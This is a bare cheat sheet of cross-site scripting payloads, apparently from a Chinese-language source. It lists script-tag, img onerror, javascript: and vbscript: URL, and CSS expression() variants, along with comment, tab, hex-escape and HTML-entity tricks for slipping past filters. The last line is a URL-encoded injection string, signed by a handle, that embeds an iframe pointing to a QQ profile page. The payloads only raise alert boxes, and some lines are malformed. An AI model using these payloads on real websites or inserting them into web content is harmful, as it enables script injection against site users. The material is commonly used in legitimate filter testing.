<script>alert("跨站")</script> (most commonly used)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)></img>
<img src="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["